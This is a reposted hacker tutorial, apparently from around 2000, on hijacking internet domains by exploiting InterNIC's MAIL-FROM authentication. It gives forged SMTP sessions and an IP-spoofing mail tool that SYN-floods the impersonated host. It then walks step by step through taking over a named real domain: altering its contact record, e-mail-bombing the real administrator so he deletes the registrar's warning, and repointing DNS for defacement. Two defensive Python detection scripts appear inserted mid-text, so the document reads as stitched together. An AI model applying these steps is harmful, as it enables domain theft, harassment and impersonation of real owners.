
Domain Hijacking via a Flaw in InterNIC's Authentication



    I. Preface
    Internet domain names are not secure and are easy to hijack. A while ago, for example, 163.net was hijacked and pointed at a different IP address, and users who connected to it thought 163.net had been hacked. In fact this was not 163.net's fault; it was caused by a flaw in the identity verification performed by the international domain registrar InterNIC.
    II. How InterNIC verifies the identity behind a request
    Let's first look at the four verification methods InterNIC uses:
    MAILFROM: the most common method. The request is verified against the Administrator's e-mail address entered when the domain was registered.
    CRYPT: the request may come from any e-mail address, but must carry a password encrypted with the standard UNIX crypt() function. The password is set at registration time.
    PGP: the registrant's PGP public key is stored in InterNIC's database, and every request must be digitally signed with the matching private key.
    FAX: the company's letterhead or official seal is sent in by fax.
    None of these verification methods is very secure; the corresponding attack on each is described below.
    III. The corresponding attacks
    1. MAILFROM is the most common verification method and also the easiest to defeat. The usual approach is to forge the Administrator's e-mail address and send a mail that modifies the domain's registration data. Because SENDMAIL does not check the actual sender's e-mail address, we can very easily forge a message that appears to come from any address. Of course, such a message is not completely forged; the method is as follows:

    telnet phunc.com 25
    Trying 209.249.172.58...
    Connected to phunc.com (209.249.172.58).
    Escape character is '^]'.
    220 darkness.phunc.com ESMTP Sendmail 8.9.2/8.9.2; Wed, 17 Mar 1999 12:01:25 -0800 (PST)
    >> HELO phunc.com
    250 darkness.phunc.com Hello phunc.wsmg.digex.net [207.87.17.101], pleased to meet you
    >> MAIL FROM:[email protected]        # this is where the sender's e-mail address is forged
    250 [email protected]... Sender ok
    >> RCPT TO:[email protected]
    250 [email protected]... Recipient ok
    >> DATA
    354 Enter mail, end with "." on a line by itself
    >> I am isno.
    >> -isno
    >>[email protected]
    .
    250 MAA36653 Message accepted for delivery
    QUIT
    221 darkness.phunc.com closing connection
    Connection closed by foreign host.
    Of course, we could just as well use one of the forged-mail tools; I usually use Kaboom!, and every e-mail bomber has this feature.
    Although this forges the sender's e-mail address, the forgery is not complete: the recipient can look at the raw message and see the actual sender's IP. For example, the forged message sent above looks like this to the recipient:

    Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
    From: [email protected]
    To: undisclosed-recipients: ;

    I am isno.
    -isno

    But if the recipient looks at the raw message, he will see:

    Return-Path:
    Received: from phunc.com (phunc.wsmg.digex.net [207.87.17.101])
        by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
        for [email protected]; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
        (envelope-from [email protected])
    Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
    From: [email protected]
    Message-Id: [email protected]
    To: undisclosed-recipients:;

    I am isno.
    -isno
    phunc.wsmg.digex.net reveals the sender's real address. Completely forging the sending address requires IP spoofing; there is a dedicated program for this, and it is used like so:
    # spoofmail -f [email protected] -h www.whitehouze.gov -t [email protected] -m phunc.com
    Originator : [email protected]
    Fakehost : www.whitehouze.gov
    Mail To : [email protected]
    Mail Server: phunc.com

    Enter your message ending with a period on a line by itself:
    Hi knight. I am Bill, your president. I wanted to thank you for your recent shipment of cigars.
    -Bill
    .
    Guessing SYN/ACK...108400.
    Synflooding www.whitehouze.gov...
    Connecting as www.whitehouze.gov to phunc.com.
    Sending mail... Sent.
    Synflooding stopped.
    Connection closed.
    #

    This forges a message from Clinton, and the raw headers give nothing away:

    Return-Path:
    Received: from phunc.com (www.whitehouze.gov [209.81.9.231])
        by darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
        for [email protected]; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
        (envelope-from [email protected])
    Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
    From: [email protected]
    Message-Id: [email protected]
    To: undisclosed-recipients:;

    Hi knight. I am Bill, your president. I wanted to thank you for your recent shipment of cigars.
    -Bill
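    The point made above, that the Received: line written by the receiving MTA records the host that really connected, is the basis of a simple triage check on the receiving side. The Python below is an added example, not code from the original article: it parses the first Received: line and the From: header and flags a message whose connecting host lies outside the domain claimed in From:. The two header samples are reconstructed from the messages shown above; the From: and recipient addresses, which are redacted on the page, are placeholders chosen here. The second sample also shows the limit of the check that the article points out: once the source address is spoofed, the recorded host agrees with the claimed domain and the verdict is "consistent", so this is a heuristic for spotting the crude forgery, not authentication of the sender.

```python
import re

# First "Received:" line written by the receiving sendmail: the HELO name,
# the reverse-DNS name and the IP of the host that actually connected.
RECEIVED_RE = re.compile(
    r"^Received:\s+from\s+(?P<helo>\S+)\s+"
    r"\((?P<rdns>[^\s\[]+)\s+\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]\)",
    re.MULTILINE,
)
# Domain part of the address in the "From:" header (bare or in angle brackets).
FROM_RE = re.compile(
    r"^From:\s*(?:.*<)?[^\s<>@]+@(?P<domain>[A-Za-z0-9.-]+)", re.MULTILINE
)


def within_domain(host, domain):
    """True if host is domain itself or a subdomain of it (case-insensitive)."""
    host, domain = host.lower().rstrip("."), domain.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def check_origin(raw_headers):
    """Compare the sender domain claimed in From: with the host the MTA saw.

    Returns a dict with the parsed fields and a verdict: 'suspicious' when the
    connecting host is outside the claimed domain, 'consistent' when it is
    inside it, 'unknown' when either header is missing.
    """
    rcv = RECEIVED_RE.search(raw_headers)
    frm = FROM_RE.search(raw_headers)
    if rcv is None or frm is None:
        return {"verdict": "unknown", "reason": "missing Received: or From: header"}
    helo, rdns, ip = rcv.group("helo"), rcv.group("rdns"), rcv.group("ip")
    claimed = frm.group("domain")
    result = {"helo": helo, "rdns": rdns, "ip": ip, "from_domain": claimed}
    if within_domain(rdns, claimed):
        result["verdict"] = "consistent"
        result["reason"] = "connecting host %s lies within %s" % (rdns, claimed)
    else:
        result["verdict"] = "suspicious"
        result["reason"] = "From: claims %s but the connecting host was %s [%s]" % (
            claimed, rdns, ip)
    return result


# Constructed sample 1: raw headers of the telnet-forged message from the
# article. The addresses are placeholders; the page redacts them.
FORGED_VIA_TELNET = """\
Received: from phunc.com (phunc.wsmg.digex.net [207.87.17.101])
\tby darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
\tfor someone@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: someone@phunc.com
To: undisclosed-recipients:;
"""

# Constructed sample 2: the spoofed-source message; addresses are again placeholders.
FORGED_VIA_SPOOFING = """\
Received: from phunc.com (www.whitehouze.gov [209.81.9.231])
\tby darkness.phunc.com (8.9.2/8.9.2) with SMTP id MAA36653
\tfor someone@phunc.com; Wed, 17 Mar 1999 12:01:40 -0800 (PST)
Date: Wed, 17 Mar 1999 12:01:40 -0800 (PST)
From: president@whitehouze.gov
To: undisclosed-recipients:;
"""

if __name__ == "__main__":
    for name, raw in (("telnet", FORGED_VIA_TELNET), ("spoofed", FORGED_VIA_SPOOFING)):
        r = check_origin(raw)
        print("%-8s %-11s %s" % (name, r["verdict"], r["reason"]))
```

    Only the first Received: line is examined on purpose: it is the one added by the MTA you operate, so it is the only one an outside sender cannot have written.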
    Ahem... I seem to have drifted off topic. This is supposed to be about domain hijacking, so how did I end up talking about forging e-mail? In fact none of that effort is needed: a simple forged message from an e-mail bomber is enough to fool InterNIC. I will describe the concrete procedure in detail later.
    2. There is no good way to deal with a CRYPT-encrypted password; this verification method appears to be fairly secure :-<
    3. PGP signature verification looks very secure, doesn't it? But InterNIC is simply... If you send InterNIC a request from a forged e-mail address without any PGP signature, what do you think happens? Does InterNIC reject your request? Ha! InterNIC completely ignores the missing PGP signature and authenticates on the basis of MAILFROM alone. This has to be called InterNIC's biggest blunder.
    4. Fax verification is also easy to abuse; it takes some social engineering, which plainly put means deceiving people. I don't intend to discuss it here; work it out for yourself...
    IV. Concrete steps for domain hijacking with a forged e-mail address
    Because MAILFROM verification simply checks the administrator's e-mail address, it is easy to abuse, and as described above, PGP verification can also be attacked with the MAILFROM method. Below is the concrete method for hijacking a domain with forged e-mail.
    Tools required:
    an anonymous mailer or e-mail bomber; a browser, such as IE; a mailbox at any free e-mail provider, such as hotmail.com.
    In the example below we assume the domain to be hijacked is wi2000.org. Let's go!
    First connect to networksolutions.com in the browser, click the "Who Is" button, enter the domain to look up, here wi2000.org, and click "Search".
    WHOIS then displays the following domain information:
    ___________________________________________________________
    Registrant:
    WI2000 (WI24-DOM)
       Blixered 1
       Goteborg, Lila Edet 46394
       SE

       Domain Name: WI2000.ORG

       Administrative Contact:
          MICKE, ANDERSSON  (AMM367)  [email protected]
          545326-3445 (FAX) 545326-3445
       Technical Contact, Zone Contact:
          Jason, Berresford  (BJE41)  [email protected]
          1-(905)-765-5212
       Billing Contact:
          MICKE, ANDERSSON  (AMM367)  [email protected]
          545326-3445 (FAX) 545326-3445

       Record last updated on 22-Jan-2000.
       Record created on 19-Dec-1999.
       Database last updated on 3-Feb-2000 14:29:53 EST.

       Domain servers in listed order:

       NS1.CAN-HOST.COM             24.215.1.6
       NS2.MOUNTAINCABLE.NET        24.215.0.12
    ____________________________________________________________
    Next we take complete control of the domain by changing the administrator's contact record.
    This method carries some risk; proceed with care!
    Now we begin the actual attack, following these steps:
    - Connect to http://www.networksolutions.com/
    - Click "Make Changes";
    - Enter the domain name wi2000.org;
    - Two buttons appear; click "Expert";
    - The next screen is titled "Select the form that meets your needs";
    - Click "Contact Form";
    - A form with two fields appears;
    - In the first field enter the administrator's handle; in this example the administrator of wi2000.org is AMM367;
    - In the second field enter the administrator's e-mail address, in this example [email protected]
    - Change the option to "Modify";
    - Now click "Proceed to Contact Information";
    - Select "MAIL-FROM" and click "Go on to Contact Data Information";
    - You should now see all of the contact information for this domain's administrator;
    - In the e-mail address field replace the e-mail with your own fake e-mail address; for example, I changed it to [email protected]
    - Click "Proceed to Set Authorization Scheme";
    - Select "MAIL-FROM" once more and enter the administrator's e-mail address, here [email protected]
    - Set the options at the bottom to "No" and "Generate Contact Form";
    - You should now see a template with all the information, roughly like this:
    _______________________________________________________________________
    ******************* Please DO NOT REMOVE Version Number **********************

    Contact Version Number: 1.0

    **************** Please see attached detailed instructions *******************

    Authorization
    0a. (N)ew (M)odify (D)elete.: Modify
    0b. Auth Scheme.............: MAIL-FROM
    0c. Auth Info...............:

    Contact Information
    1a. NIC Handle..............: AMM367
    1b. (I)ndividual (R)ole.....: Individual
    1c. Name....................: MICKE, ANDERSSON
    1d. Organization Name.......: WI2000
    1e. Street Address..........: BLIXERED 1
    1f. City....................: GOTEBORG
    1g. State...................: LILLA EDET
    1h. Postal Code.............: 46394
    1i. Country.................: SE
    1j. Phone Number............: 545326-3445
    1k. Fax Number..............: 545326-3445
    1l. E-Mailbox...............: [email protected]

    Notify Information
    2a. Notify Updates..........: AFTER-UPDATE
    2b. Notify Use..............: AFTER-USE

    Authentication
    3a. Auth Scheme.............: MAIL-FROM
    3b. Auth Info...............: [email protected]
    3c. Public (Y/N)............: NO
    ______________________________________________________________________
    Note: at this point do NOT click the "Mail this contact form to me!" button at the bottom, or all your work is wasted!
    Now copy the template above into your anonymous mailer or e-mail bomber, but don't send it yet! The most complicated part comes next.
    When you mail this information to [email protected], the following message is sent to the domain administrator's mailbox:
    ____________________________________
    Subject: [NIC-000128.4r50] Your Mail
    __________________________________________________________________________
    This is an automatic reply to acknowledge that your message has been received by [email protected]. This acknowledgement is "NOT" a confirmation that your request has been processed. You will be notified when it has been completed.

    If you should have need to correspond with us regarding this request, please include the tracking number [NIC-000128.4r50] in the subject. The easiest way to do this is simply to reply to this message.

    If you have not already done so, please come and visit our site via www browser or ftp and pick-up the latest domain template or review the Domain Name Registration Service Agreement at the URL's:

    Domain Name Registration Service Agreement
    http://www.networksolutions.com/legal/service-agreement.html
    Domain Name Registration Template
    ftp://www.networksolutions.com/templates/domain-template.txt

    Regards,
    Network Solutions Registration Services

    ***********************************************
    *********************************************** IMPORTANT INFORMATION ***********************************************
    On January 15, 2000, Network Solutions introduced Service Agreement, Version 6.0. All versions of the Service Agreement template will continue to be accepted and processed until January 31, 2000. On and after February 1, 2000, please use the Network Solutions Service Agreement, Version 6.0 template located at ftp://www.networksolutions.com/templates/domain-template.txt for all template requests.

    The terms and conditions of the Service Agreement are available on our Web site at http://www.networksolutions.com/legal/service-agreement.html.
    ************************************************

    The zone files, which make the Internet work, are normally updated twice daily, 7 days a week at 5:00 AM and 5:00 PM U.S. Eastern Standard Time. Requests that are completed before these times will be included in that 12-hour zone file update and will normally begin to take effect within 5-6 hours.

    Should you wish to modify or delete an existing domain name registration, you can do so online, using our Service Agreement. You can change the registrant's address, replace a contact/agent with a different contact/agent, or change primary and/or secondary name server information.

    To update information about an existing contact, such as postal address, e-mail address or telephone number, complete and submit the Contact Form to [email protected]. This form is available on our Web site at www.networksolutions.com

    To register or update information about a name server, complete and submit the Host Form to [email protected]. This form is also available on our Web site.

    Network Solutions Registration Services
    e-mail: [email protected]
    _______________________________________________________________________

    This message is a problem for our attack: as soon as the real administrator reads it, he will see through our trick. But we still have a way around it. Use your e-mail bomber to send 20 to 30 similar messages to the administrator's mailbox; when he sees twenty or thirty near-identical messages, he will assume someone is playing a prank with an e-mail bomber and will usually delete them all, and then we are safe.
    Even if he does reply to them, he will usually get the tracking number wrong; the tracking number here is [NIC-000128.4r50]. Of course, when you bomb him you must not use the real tracking number; forge several different ones. Here are some typical-looking tracking numbers:
    [NIC-000127.5089] [NIC-000128.4rg7] [NIC-000128.523f] [NIC-000127.53d0] [NIC-000129.r609] [NIC-000128.3f6y] [NIC-000128.5d8t] [NIC-000127.r509] [NIC-000128.4r30] [NIC-000127.d307]
    Note: change these numbers not only in the subject line but inside the message body as well.
    In this example you should send the e-mail to [email protected] while posing as [email protected], with the subject and body as described above.
    After sending 10 to 15 messages to him, stop, and then, posing as [email protected], send a forged reply to [email protected] with the following content:
    _______________________________________________________________________
    ******************* Please DO NOT REMOVE Version Number **********************

    Contact Version Number: 1.0

    **************** Please see attached detailed instructions *******************

    Authorization
    0a. (N)ew (M)odify (D)elete.: Modify
    0b. Auth Scheme.............: MAIL-FROM
    0c. Auth Info...............:

    Contact Information
    1a. NIC Handle..............: AMM367
    1b. (I)ndividual (R)ole.....: Individual
    1c. Name....................: MICKE, ANDERSSON
    1d. Organization Name.......: WI2000
    1e. Street Address..........: BLIXERED 1
    1f. City....................: GOTEBORG
    1g. State...................: LILLA EDET
    1h. Postal Code.............: 46394
    1i. Country.................: SE
    1j. Phone Number............: 545326-3445
    1k. Fax Number..............: 545326-3445
    1l. E-Mailbox...............: [email protected]

    Notify Information
    2a. Notify Updates..........: AFTER-UPDATE
    2b. Notify Use..............: AFTER-USE

    Authentication
    3a. Auth Scheme.............: MAIL-FROM
    3b. Auth Info...............: [email protected]
    3c. Public (Y/N)............: NO
    ______________________________________________________________________
    Note: do not put anything in the subject line of this message!
    Then send this message, once only; do not bomb [email protected] with it.
    Next keep bombing [email protected] until 30 to 35 bombs with different tracking numbers have been sent.
    Now all that remains is to wait. Usually after 24 hours you are the administrator of wi2000.org and can do whatever you like with the domain.
    For example, to point wi2000.org at a different IP address I follow these steps:
    - Open the browser and enter http://www.networksolutions.com/cgi-bin/makechanges/change-registrar;
    - Enter the target, e.g. wi2000.org;
    - Enter the requested details, giving the Administrative e-mail address, which is now [email protected];
    - Change the target's DNS servers to DNS servers you control; for example, I already control ns.some.com, so I set the DNS server to ns.some.com;
    - Confirm;
    - After two or three minutes you receive a message from [email protected] asking you to confirm;
    - Confirm it.
    The name server of wi2000.org has now been replaced with ns.some.com, so we go to ns.some.com and edit the zone files. To find where the zone files live, first look in /etc/named.boot, and add this line to it:
    primary wi2000.org wi2000.hosts
    Find the line directory "/var/named", which says the zone files are kept under /var/named. Create a file wi2000.hosts under /var/named with the following content:
    @    IN  SOA  ns.some.net. cf.pub.some.com. (
                  1999111802
                  10800
                  3600
                  604800
                  86400 )
    @    IN  NS   ns.some.com.
    www  IN  A    204.192.96.173
    204.192.96.173 is another host under our control. Then restart the name server from the command line:
    #/etc/rc.d/init.d/named restart
    Note: all of the steps above assume that the name server on ns.some.com is BIND.
    Now when someone connects to www.wi2000.org with a browser, he is taken to 204.192.96.173, and because 204.192.96.173 is under our control we can change its home page at will, so everyone thinks www.wi2000.org has been hacked!
    Note: the method above only works when the administrative e-mail and the technical e-mail registered with InterNIC are different.
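    Every step of the hijack described in sections IV above leaves a trace in the public registration record: first the administrative contact e-mail changes, then the delegated name servers. A registrant who keeps a stored copy of the record and compares it against the live one at intervals therefore sees the takeover long before the 24-hour wait is over. The Python below is an added example, not code from the article: it parses a Network Solutions style WHOIS record into the fields that matter (domain, administrative and technical contact e-mail, name servers) and reports every field that differs from a baseline. The baseline record is reconstructed from the wi2000.org WHOIS output shown earlier; the contact addresses, redacted on the page, and the address of the replacement name server, which the page never gives, are placeholders chosen here.

```python
import re

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# "NS1.CAN-HOST.COM   24.215.1.6" style lines under "Domain servers in listed order:"
NS_RE = re.compile(r"^([A-Za-z0-9.-]+)\s+(\d{1,3}(?:\.\d{1,3}){3})$")


def parse_whois(text):
    """Pull out the fields a registrant-record hijack changes: the domain, the
    administrative and technical contact e-mail, and the delegated name servers."""
    rec = {"domain": None, "admin_email": None, "tech_email": None, "name_servers": []}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Domain Name:"):
            rec["domain"] = line.split(":", 1)[1].strip().lower()
        elif line.startswith("Administrative Contact"):
            section = "admin_email"
        elif line.startswith("Technical Contact"):
            section = "tech_email"
        elif line.startswith("Billing Contact"):
            section = None
        elif line.startswith("Domain servers in listed order"):
            section = "ns"
        elif section == "ns":
            m = NS_RE.match(line)
            if m:
                rec["name_servers"].append((m.group(1).upper(), m.group(2)))
        elif section in ("admin_email", "tech_email") and rec[section] is None:
            m = EMAIL_RE.search(line)
            if m:
                rec[section] = m.group(0).lower()
    return rec


def detect_drift(baseline, current):
    """Return one alert string per field that differs from the stored baseline."""
    alerts = []
    for field in ("admin_email", "tech_email"):
        if baseline[field] != current[field]:
            alerts.append("%s changed: %s -> %s" % (field, baseline[field], current[field]))
    if baseline["name_servers"] != current["name_servers"]:
        old = ", ".join(h for h, _ in baseline["name_servers"]) or "(none)"
        new = ", ".join(h for h, _ in current["name_servers"]) or "(none)"
        alerts.append("name servers changed: %s -> %s" % (old, new))
    return alerts


# Constructed baseline: the wi2000.org record from the article, with placeholder
# e-mail addresses in place of the redacted ones.
BASELINE_WHOIS = """\
Registrant:
WI2000 (WI24-DOM)
   Blixered 1
   Goteborg, Lila Edet 46394
   SE

   Domain Name: WI2000.ORG

   Administrative Contact:
      MICKE, ANDERSSON  (AMM367)  admin@wi2000.example
      545326-3445 (FAX) 545326-3445
   Technical Contact, Zone Contact:
      Jason, Berresford  (BJE41)  tech@can-host.example
      1-(905)-765-5212
   Billing Contact:
      MICKE, ANDERSSON  (AMM367)  admin@wi2000.example

   Record last updated on 22-Jan-2000.

   Domain servers in listed order:

   NS1.CAN-HOST.COM             24.215.1.6
   NS2.MOUNTAINCABLE.NET        24.215.0.12
"""

# Constructed "after" record: admin e-mail and delegation changed as in the article.
# intruder@mailbox.example and 192.0.2.53 (a TEST-NET address) are placeholders.
HIJACKED_WHOIS = BASELINE_WHOIS.replace(
    "(AMM367)  admin@wi2000.example\n      545326", "(AMM367)  intruder@mailbox.example\n      545326"
).split("Domain servers in listed order:")[0] + """Domain servers in listed order:

   NS.SOME.COM                  192.0.2.53
"""

if __name__ == "__main__":
    for alert in detect_drift(parse_whois(BASELINE_WHOIS), parse_whois(HIJACKED_WHOIS)):
        print("ALERT:", alert)
```

    The replace in HIJACKED_WHOIS is anchored on the phone-number line so that only the Administrative Contact entry changes and the identical Billing Contact line is left alone, which is what a registrar record looks like after the contact-form modification in section IV.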


    References:
    A guide to exploiting Network Solution's InterNIC. -- knight ([email protected])
    Domain Name Robbery (aka Domain-Jacking): A Flaw in InterNIC Authentication Scheme -- Lucifer Mirza ([email protected])

    Contact me:
    e-mail: [email protected]
    homepage: http://isno.yeah.net
    irc: 202.96.137.64:6667 #darksun
    My PGP key:
    -----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: 2.6.3i

    mQCNAzms8foAAAEEAKHdhUomcQ07xx//rfv40gJUU4aZMfQy/4NAc4UUUVv/ObM4
    pDYvbzPblEBIincbMwGKJZqosuk392F5hBZqt7aIGlvhnGzMDf8cIAQknIYvUn+H
    GCy0nOqLhFQusMxrSwMy33BTjMrqmwQr/ZjjfM8ObaOROeo1rCplpLS4wRQ9AAUR
    tARpc25viQCVAwUQOazx+iplpLS4wRQ9AQHceAP8DzZzv/n1xFCZSm1Q9C29bSgf
    uRRX5qV8tufQMAL8KWnomo1I9kvnUUTvYwgn1uc5uHysbNERyHad3MY+a7k94IAx
    dcX0CYlDnW8koNzGTO6TjdzfByzckb5dvp9fDH3PhjZ8trtN4z6jYQkG5MvPC80h
    NxBrN0SwiJKIapj29gI=
    =JP/1
    -----END PGP PUBLIC KEY BLOCK-----
    -EOF


    Posted by: Crystal   Source: reposted